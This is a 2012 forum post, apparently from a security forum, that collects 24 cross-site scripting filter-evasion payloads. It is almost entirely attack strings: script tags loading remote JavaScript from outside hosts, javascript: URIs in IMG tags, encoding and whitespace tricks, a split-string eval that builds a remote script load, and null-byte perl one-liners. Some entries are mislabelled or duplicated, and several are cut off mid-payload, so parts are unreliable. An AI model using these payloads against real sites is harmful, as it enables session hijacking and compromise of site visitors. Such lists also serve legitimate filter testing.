Title: XSS cross-site scripting attack roundup   Author: admin   Time: 2012-9-5 14:56

There seems to be little XSS material on t00ls; I saw something good and copied it over, not sure whether any fellow members need to bookmark it.

(1) Ordinary XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using a JavaScript directive
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (the semicolons are required)
<IMG SRC=javascript:alert("XSS")>

(6) Defective IMG tag, corrected
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding, without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hexadecimal encoding, also without semicolons (calculator)
<IMG SRC=java..omitted..XSS')>

(11) Embedded tab, splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(12) Embedded encoded tab, splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">

(15) Embedded multi-line JavaScript injection; this is an extreme XSS example
<IMG SRC="javascript:alert('XSS')">

(16) Getting around a character limit (must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2; null characters basically have no effect in China, because there is nowhere they can be exploited
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) IMG tag with spaces and meta characters before the JavaScript
<IMG SRC=" javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open angle brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and some other browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>